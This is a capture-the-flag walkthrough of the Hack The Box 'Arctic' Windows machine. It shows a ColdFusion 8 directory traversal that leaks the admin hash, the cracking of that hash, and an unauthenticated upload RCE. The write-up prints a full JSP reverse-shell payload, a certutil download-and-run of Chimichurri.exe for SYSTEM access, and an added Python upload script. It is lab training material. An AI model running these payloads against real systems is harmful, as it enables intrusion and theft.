Arctic
Arctic Windows · Easy - Adventure mode
🔭 Reconnaissance:
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ nmap -p- -sSVC --min-rate 5000 10.129.7.67
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-12 11:09 +0100
Nmap scan report for 10.129.7.67
Host is up (0.045s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open http JRun Web Server
49154/tcp open msrpc Microsoft Windows RPC
The site shows some directories and files, which I understood we had to explore.
A lot of information is exposed here, which is not a good idea.
For example, it gives away the database technology in use.
Browsing to CFIDE/probe.cfm shows which technology the site is built on. Port 8500 with the JRun banner is the default for ColdFusion's built-in web server, and the install is ColdFusion 8 (the shell later lands in C:\ColdFusion8), which is what narrows the exploit search.
💣 Preparation:
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ searchsploit coldfusion
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit) | multiple/remote/16985.rb
Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) | windows/remote/50781.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Executio | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload | multiple/webapps/45979.txt
Adobe ColdFusion 2023.6 - Remote File Read | multiple/webapps/52387.py
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting | cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities | cfm/webapps/36172.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) | multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit) | multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripti | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Si | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Sit | cfm/webapps/33168.txt
Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Re | multiple/webapps/51875.py
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | windows/local/19220.c
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure | multiple/remote/19712.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting | cfm/remote/21548.txt
ColdFusion MX - Remote Development Service | windows/remote/50.pl
ColdFusion Scripts Red_Reservations - Database Disclosure | asp/webapps/7440.txt
ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service | multiple/dos/19996.txt
Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure | cfm/webapps/22544.txt
Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service | multiple/dos/24013.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | multiple/remote/22867.pl
Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting | cfm/webapps/23256.txt
Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation | multiple/remote/24654.txt
------------------------------------------------------------------------------------------- ---------------------------------
searchsploit -m multiple/remote/14641.py
Exploit: Adobe ColdFusion - Directory Traversal
URL: https://www.exploit-db.com/exploits/14641
Path: /usr/share/exploitdb/exploits/multiple/remote/14641.py
Codes: CVE-2010-2861, OSVDB-67047
Verified: True
File Type: HTML document, ASCII text
Copied to: /home/pmartinezr/htb/artic/14641.py
There are a lot of possible exploits for ColdFusion; I suppose the hardest part was finding one that worked.
The one copied with searchsploit -m, 14641.py, is the directory traversal tracked as CVE-2010-2861, which affects ColdFusion 8 (it is a Python 2 script, as the invocation below shows).
👽 Actions:
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ python2 14641.py 10.129.7.67 8500
usage: 14641.py <host> <port> <file_path>
example: 14641.py localhost 80 ../../../../../../../lib/password.properties
if successful, the file will be printed
So we simply copy the path from the example command and run it. The target, lib/password.properties, is where ColdFusion 8 keeps the administrator password hash and the RDS password.
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ python2 14641.py 10.129.7.67 8500 ../../../../../../../lib/password.properties
------------------------------
trying /CFIDE/wizards/common/_logintowizard.cfm
title from server in /CFIDE/wizards/common/_logintowizard.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
------------------------------
trying /CFIDE/administrator/archives/index.cfm
title from server in /CFIDE/administrator/archives/index.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
------------------------------
trying /cfide/install.cfm
title from server in /cfide/install.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
------------------------------
trying /CFIDE/administrator/entman/index.cfm
title from server in /CFIDE/administrator/entman/index.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
------------------------------
trying /CFIDE/administrator/enter.cfm
title from server in /CFIDE/administrator/enter.cfm:
------------------------------
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
------------------------------
Running the exploit returns the file through every one of the five .cfm pages the script tries, so the traversal is not tied to a single page. It reveals the administrator password as a SHA-1 hash, 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 (encrypted=true means the stored value is a hash, not something reversible), plus the RDS password in rdspassword.
hashcat -m 100 "2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03" /usr/share/wordlists/rockyou.txt
2f635f6d20e3fde0c53075a84b68fb07dcec9b03:happyday
With hashcat (mode 100, raw SHA-1) against rockyou we recover the first password, happyday, which lets us into the ColdFusion Administrator panel under /CFIDE/administrator/ and keep exploring.
We can log in as the administrator user.
I explored some of the settings, assuming there must be some way to exploit the application by manipulating options.
It occurred to me to create a scheduled task that fetched a payload hosted on Kali through a URL; however, it didn't work, although I suppose it can be done that way.
💣 Preparation:
The simplest way to exploit the application was with the following exploit: https://www.exploit-db.com/exploits/50057. It is a Python 3 script with lhost, lport, rhost and rport hard-coded at the top (hence the call below with no arguments), and it spawns its own nc listener for the reverse shell, so netcat has to be on the path.
👽 Actions:
┌──(pmartinezr㉿kali)-[~/htb/artic]
└─$ python 50057.py
Generating a payload...
Payload size: 1498 bytes
Saved as: 3bf7e8d10bbc450db38a209b675d8cad.jsp
Priting request...
Content-type: multipart/form-data; boundary=763a6805936e428f8d1b4921c935858c
Content-length: 1699
--763a6805936e428f8d1b4921c935858c
Content-Disposition: form-data; name="newfile"; filename="3bf7e8d10bbc450db38a209b675d8cad.txt"
Content-Type: text/plain
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream kL;
OutputStream zV;
StreamConnector( InputStream kL, OutputStream zV )
{
this.kL = kL;
this.zV = zV;
}
public void run()
{
BufferedReader ja = null;
BufferedWriter hkC = null;
try
{
ja = new BufferedReader( new InputStreamReader( this.kL ) );
hkC = new BufferedWriter( new OutputStreamWriter( this.zV ) );
char buffer[] = new char[8192];
int length;
while( ( length = ja.read( buffer, 0, buffer.length ) ) > 0 )
{
hkC.write( buffer, 0, length );
hkC.flush();
}
} catch( Exception e ){}
try
{
if( ja != null )
ja.close();
if( hkC != null )
hkC.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "10.10.14.154", 4444 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
--763a6805936e428f8d1b4921c935858c--
Sending request and printing response...
<script type="text/javascript">
window.parent.OnUploadCompleted( 0, "/userfiles/file/3bf7e8d10bbc450db38a209b675d8cad.jsp/3bf7e8d10bbc450db38a209b675d8cad.txt", "3bf7e8d10bbc450db38a209b675d8cad.txt", "0" );
</script>
Printing some information for debugging...
lhost: 10.10.14.154
lport: 4444
rhost: 10.129.7.67
rport: 8500
payload: 3bf7e8d10bbc450db38a209b675d8cad.jsp
Deleting the payload...
Listening for connection...
Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.154] from (UNKNOWN) [10.129.7.67] 52041
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
c:\Users\tolis\Desktop>type user.txt
type user.txt
1a4fb5b047295abe*******
certutil -urlcache -split -f http://10.10.14.154/Chimichurri.exe
c:\Users\tolis>.\Chimichurri.exe 10.10.14.154 5555
.\Chimichurri.exe 10.10.14.154 5555
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
c:\Users\tolis>whoami
whoami
arctic\tolis
We get the user flag. Then, from the same shell, we fetch Chimichurri.exe onto the box with certutil and run it with Kali's IP and port 5555. Chimichurri is the public exploit for MS10-059 (the Windows tracing-feature ACL flaw), which fits the unpatched build in the banner (6.1.7600 is Windows 7 / Server 2008 R2 with no service pack); it obtains a SYSTEM token and sends a reverse shell to the given host and port, so a listener has to be waiting on 5555 before it is run. The whoami that follows still prints arctic\tolis because it runs in the original shell; the SYSTEM shell lands on the listener.
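The upload the exploit prints above, as an added example that is not 50057's own code: it assembles the same single-part multipart/form-data body, parses the OnUploadCompleted callback the server returns, and derives the URL that executes the uploaded file. The connector endpoint and the CurrentFolder=/<name>.jsp%00 trick are taken from the public exploit's source and are assumptions here, since the page shows only the request body and the response; SAMPLE_RESPONSE is the callback shown on the page, embedded as test input.

```python
"""Added example (not exploit 50057's own code): the multipart body the
page's output shows, the connector response parser, and the URL that
runs the uploaded file.

Assumptions: UPLOAD_PATH (endpoint and the CurrentFolder=/<name>.jsp%00
trick) comes from the public exploit's source, not from this page;
SAMPLE_RESPONSE is the callback the page shows, embedded as test input.
"""
import re
import sys
import urllib.request
import uuid

# Upload endpoint used by 50057 (assumption: from the exploit source, not shown on the page).
UPLOAD_PATH = ("/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"
               "?Command=FileUpload&Type=File&CurrentFolder=/{name}.jsp%00")

# window.parent.OnUploadCompleted( <code>, "<stored path>", "<file name>", "<msg>" );
UPLOAD_RE = re.compile(
    r'OnUploadCompleted\(\s*(\d+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')


def build_multipart(name, payload, boundary=None):
    """Single 'newfile' part, laid out exactly like the page's printed request.

    CRLF framing is mandatory for multipart/form-data. With a 32-hex boundary
    and a 32-hex name the framing is 201 bytes, which is the 1699 - 1498
    difference between Content-length and payload size in the page's output.
    """
    boundary = boundary or uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="newfile"; filename="{name}.txt"\r\n'
        "Content-Type: text/plain\r\n"
        "\r\n"
        f"{payload}\r\n"
        f"--{boundary}--\r\n"
    )
    return f"multipart/form-data; boundary={boundary}", body.encode("utf-8")


def upload_request(host, port, name, payload, boundary=None):
    """Assemble URL, headers and body for the upload (nothing is sent here)."""
    content_type, body = build_multipart(name, payload, boundary)
    url = f"http://{host}:{port}" + UPLOAD_PATH.format(name=name)
    headers = {"Content-Type": content_type, "Content-Length": str(len(body))}
    return url, headers, body


def parse_upload_response(html):
    """Return (error_code, stored_path) from the connector's JS callback.

    Code 0 is success. The stored path sits under a directory named
    <name>.jsp with the .txt inside; requesting it runs it as a JSP
    (assumption about the server side; the page only shows that it works).
    """
    m = UPLOAD_RE.search(html)
    if not m:
        return None, None
    return int(m.group(1)), m.group(2)


def execution_url(host, port, stored_path):
    """GET this URL, with the listener already up, to trigger the payload."""
    return f"http://{host}:{port}{stored_path}"


# The callback the page's output shows, embedded as constructed test input.
SAMPLE_RESPONSE = '''<script type="text/javascript">
window.parent.OnUploadCompleted( 0, "/userfiles/file/3bf7e8d10bbc450db38a209b675d8cad.jsp/3bf7e8d10bbc450db38a209b675d8cad.txt", "3bf7e8d10bbc450db38a209b675d8cad.txt", "0" );
</script>'''


if __name__ == "__main__":
    # python3 cf_upload.py <host> <port> <payload.jsp>; start the listener first.
    host, port, jsp_file = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    name = uuid.uuid4().hex
    with open(jsp_file) as f:
        url, headers, body = upload_request(host, port, name, f.read())
    req = urllib.request.Request(url, data=body, headers=headers)
    with urllib.request.urlopen(req) as r:
        code, stored = parse_upload_response(r.read().decode("utf-8", "replace"))
    if code != 0 or not stored:
        sys.exit(f"upload failed: code={code}")
    print("stored at", stored)
    try:
        # The JSP blocks for as long as the shell lives, so the timeout is expected to fire.
        urllib.request.urlopen(execution_url(host, port, stored), timeout=5)
    except OSError:
        pass
```

Nothing in this path uses the administrator password recovered earlier: the script is run without credentials, so the upload and the shell do not depend on the hashcat step at all, which is worth noting when reporting the finding.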
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.154:5555
[*] Command shell session 1 opened (10.10.14.154:5555 -> 10.129.7.67:52193) at 2026-03-12 23:36:30 +0100
Shell Banner:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Users\tolis>
-----
c:\Users\tolis>whoami
whoami
nt authority\system
We catch the shell on Kali with the Metasploit multi/handler (a plain nc -lvnp 5555 would catch it just as well, since Chimichurri sends a cmd.exe reverse shell) and we are nt authority\system, so we can do whatever we want, such as reading the root flag at c:\users\administrator\root.txt.